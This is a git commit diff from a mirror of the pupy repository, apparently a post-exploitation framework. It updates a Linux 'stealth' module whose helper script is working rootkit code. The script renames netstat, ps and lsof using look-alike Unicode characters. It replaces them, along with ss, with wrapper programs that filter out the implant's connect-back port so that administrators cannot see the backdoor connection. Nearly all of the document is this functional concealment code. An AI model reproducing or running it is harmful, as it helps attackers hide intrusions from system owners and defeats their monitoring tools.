mirror of https://github.com/n1nj4sec/pupy.git
Merge branch 'RedSunEmpire-master' into dev
This commit is contained in:
n1nj4sec
commit
5d72cfaac5
|
|
@ -1,31 +1,23 @@
|
|||
#!/usr/bin/env python
|
||||
from pupylib.PupyModule import *
|
||||
from pupylib.utils.rpyc_utils import redirected_stdio
|
||||
|
||||
__class_name__="SetStealth"
|
||||
def print_callback(data):
|
||||
sys.stdout.write(data)
|
||||
sys.stdout.flush()
|
||||
|
||||
@config(cat="manage", compat="unix")
|
||||
@config(compat="linux", cat="manage")
|
||||
class SetStealth(PupyModule):
|
||||
"""Hides the runnin process from netstat, ss, ps, lsof by using modified binaries. Be careful when choosing the port.
|
||||
"""Hides the runnin process from netstat, ss, ps, lsof by using modified binaries.
|
||||
Credits to: http://www.jakoblell.com/blog/2014/05/07/hacking-contest-rootkit/
|
||||
|
||||
********************** /!\ WARNING /!\ **********************
|
||||
* Do NOT run the stealh module more than ONCE on a machine. *
|
||||
* Running it two times will brake the binaries. *
|
||||
*************************************************************
|
||||
NOTE: The pp.py script needs to be running with root privileges in order to run this module."""
|
||||
Demo: https://vimeo.com/157356150"""
|
||||
dependencies=["linux_stealth"]
|
||||
def init_argparse(self):
|
||||
self.arg_parser = PupyArgumentParser(prog="Linux Stealth Module", description=self.__doc__)
|
||||
self.arg_parser.add_argument('port', type=int, help='The port number to which Pupy is connecting to.')
|
||||
self.arg_parser.add_argument('--port', default=None, help='The port number to which Pupy is connecting to.')
|
||||
|
||||
def is_compatible(self):
|
||||
a,r=super(SetStealth, self).is_compatible()
|
||||
if not a:
|
||||
return False, r
|
||||
if self.client.conn.modules['subprocess'].check_output(r"ls -l `dirname \`which netstat\``/net*tat | wc -l", shell=True).strip() == "2":
|
||||
return False, "It looks like this module has already been run on this machine."
|
||||
return True, ""
|
||||
|
||||
def run(self, args):
|
||||
self.client.load_package("linux_stealth")
|
||||
self.client.conn.modules['linux_stealth'].run(str(args.port))
|
||||
with redirected_stdio(self.client.conn):
|
||||
self.client.conn.modules['linux_stealth'].run(args.port)
|
||||
self.success("Module executed successfully.")
|
||||
|
|
|
|||
|
|
@ -1,36 +1,50 @@
|
|||
#!/usr/bin/env python
|
||||
|
||||
import os
|
||||
import sys
|
||||
import subprocess
|
||||
import os
|
||||
import time
|
||||
|
||||
def cmd_exists(cmd):
|
||||
return subprocess.call("type " + cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) == 0
|
||||
|
||||
def run(port):
|
||||
if cmd_exists("gcc") == True:
|
||||
bash=r"""which netstat ps lsof|perl -pe'$s="\x{455}";$n="\x{578}";chop;$o=$_;s/([ltp])s/\1$s/||s/fin/fi$n/;rename$o,$_;open F,"|gcc -xc - -o$o";print F qq{int main(int a,char**b){char*c[999999]={"sh","-c","$_ \$*|grep -vE \\"""+'"'+port+"""|\$\$|[$s-$n]|grep\\\\""};memcpy(c+3,b,8*a);execv("/bin/sh",c);}}'"""
|
||||
#subprocess.call(bash, shell=True)
|
||||
with open('/tmp/b', 'w') as f:
|
||||
f.write(bash)
|
||||
os.system("bash /tmp/b")
|
||||
time.sleep(3)
|
||||
os.remove("/tmp/b")
|
||||
else:
|
||||
bash=r"""which netstat ps lsof |perl -pe'$s="\x{455}";$n="\x{578}";chop;$o=$_;s/([ltp])s/\1$s/||s/fin/fi$n/;rename$o,$_;open F,">$o";print F"#!/bin/sh\n$_ \$*|grep -vE \"[$s-$n]|grep|"""+port+"""\\\\"";chmod 493,$o'"""
|
||||
with open("/tmp/p", "w") as f:
|
||||
f.write(bash)
|
||||
os.system("bash /tmp/p")
|
||||
time.sleep(3)
|
||||
os.remove("/tmp/p")
|
||||
bashss="""#!/bin/bash
|
||||
def run(port=None):
|
||||
if port is None:
|
||||
try:
|
||||
import pupy
|
||||
host, port=pupy.get_connect_back_host().split(":")
|
||||
except:
|
||||
raise Exception("pupy connect back port couldn't be found, please precise it manually")
|
||||
|
||||
print "hidding port %s ..."%port
|
||||
|
||||
a=subprocess.check_output(["netstat", "-tn"])
|
||||
if port in a:
|
||||
def cmd_exists(cmd):
|
||||
return subprocess.call("type " + cmd, shell=True,
|
||||
stdout=subprocess.PIPE, stderr=subprocess.PIPE) == 0
|
||||
if cmd_exists("gcc") == True:
|
||||
bash=r"""which netstat ps lsof|perl -pe'$s="\x{455}";$n="\x{578}";chop;$o=$_;s/([ltp])s/\1$s/||s/fin/fi$n/;rename$o,$_;open F,"|gcc -xc - -o$o";print F qq{int main(int a,char**b){char*c[999999]={"sh","-c","$_ \$*|grep -vE \\"""+'"'+port+"""|\$\$|[$s-$n]|grep\\\\""};memcpy(c+3,b,8*a);execv("/bin/sh",c);}}'"""
|
||||
with open('/tmp/b', 'w') as f:
|
||||
f.write(bash)
|
||||
f.close()
|
||||
os.system("bash /tmp/b")
|
||||
time.sleep(3)
|
||||
os.remove("/tmp/b")
|
||||
else:
|
||||
bash=r"""which netstat ps lsof |perl -pe'$s="\x{455}";$n="\x{578}";chop;$o=$_;s/([ltp])s/\1$s/||s/fin/fi$n/;rename$o,$_;open F,">$o";print F"#!/bin/sh\n$_ \$*|grep -vE \"[$s-$n]|grep|"""+port+"""\\\\"";chmod 493,$o'"""
|
||||
with open("/tmp/p", "w") as f:
|
||||
f.write(bash)
|
||||
f.close()
|
||||
os.system("bash /tmp/p")
|
||||
time.sleep(3)
|
||||
os.remove("/tmp/p")
|
||||
bashss="""#!/bin/bash
|
||||
/bin/zss $* | grep -v """+port
|
||||
get_ss_path=subprocess.check_output('which ss', shell=True)
|
||||
path=get_ss_path[:-3]
|
||||
os.system("mv "+path+"ss "+path+"zss")
|
||||
with open(path+"ss", "w") as newss:
|
||||
newss.write(bashss)
|
||||
os.system("chmod +x "+path+"ss")
|
||||
#blazo - fresh orange
|
||||
#brock - september 22nd
|
||||
#Creds to: www.jakoblell.com/blog/2014/05/07/hacking-contest-rootkit/
|
||||
get_ss_path=subprocess.check_output('which ss', shell=True)
|
||||
path=get_ss_path[:-3]
|
||||
os.system("mv "+path+"ss "+path+"zss")
|
||||
with open(path+"ss", "w") as newss:
|
||||
newss.write(bashss)
|
||||
newss.close()
|
||||
os.system("chmod +x "+path+"ss")
|
||||
else:
|
||||
print "port is already hidden"
|
||||
|
|
|
|||
Loading…
Reference in New Issue